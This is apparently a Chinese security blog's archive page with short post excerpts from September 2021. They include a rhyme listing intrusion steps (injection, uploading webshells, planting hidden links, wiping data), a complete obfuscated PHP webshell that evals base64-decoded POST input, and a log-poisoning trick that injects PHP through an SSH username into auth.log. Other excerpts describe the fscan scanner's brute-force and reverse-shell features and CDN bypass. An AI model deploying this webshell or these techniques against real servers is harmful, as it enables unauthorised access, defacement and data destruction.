09 2021 档案
摘要:一:老黑客三字经 进谷歌 找注入没注入 就旁注没旁注 用Oday没Oday 猜目录没目录 就嗅探爆账户 找后台传小马 放大马拿权限 挂页面放暗链 清数据 二:新黑客三字经 搞企业 先扫描扫描器 商业好默密码 都知道社工库 找一找邮箱号 先列好九头蛇 跑一跑搞不定 放大招发邮件 凭伪造没邮箱 搞网站二
阅读全文
摘要:python -m SimpleHTTPServer 8888 使用上面的命令可以把当前目录发布到8888端口。 直接浏览器访问 但是这条命令是当前运行的,不是后台运行的,也就是说如果Ctrl + C,则该端口就会关闭。 python -m SimpleHTTPServer 8888 & 在上述命令
阅读全文
摘要:fscan简介 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能 主要功能 1.信息搜集: 存活探测(
阅读全文
摘要:<?php if(isset($_REQUEST['phpsessid'])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST['key'],3)); eval(B::$d); } ?>
阅读全文
摘要:这是一篇全网(无论国内还是国外)最全、最详细、最新、最实用的关于 CDN 网络对抗攻击的文章,渗透测试中若碰到 CDN 类的问题,只需要看这一篇指南即可。我也会在 Github (https://github.com/bin-maker/2021CDN/)长期保持此文的更新,更新与修正新的对抗技术、
阅读全文
摘要:今天看文章学了一招,有包含漏洞无法传文件的时候用 目标服务器环境为ubuntu,ssh登录日志文件是/var/log/auth.log 找个Linux的环境执行ssh '<? phpinfo(); ?>'@192.168.48.129 这个时候我们看下auth.log里面有什么 PHP代码被成功写入
阅读全文
摘要:搬瓦攻方案库存监控页面 https://stock.bwg.net/ https://bwh81.net/ https://bandwagonhost.com/ https://teddysun.com/602.html
阅读全文
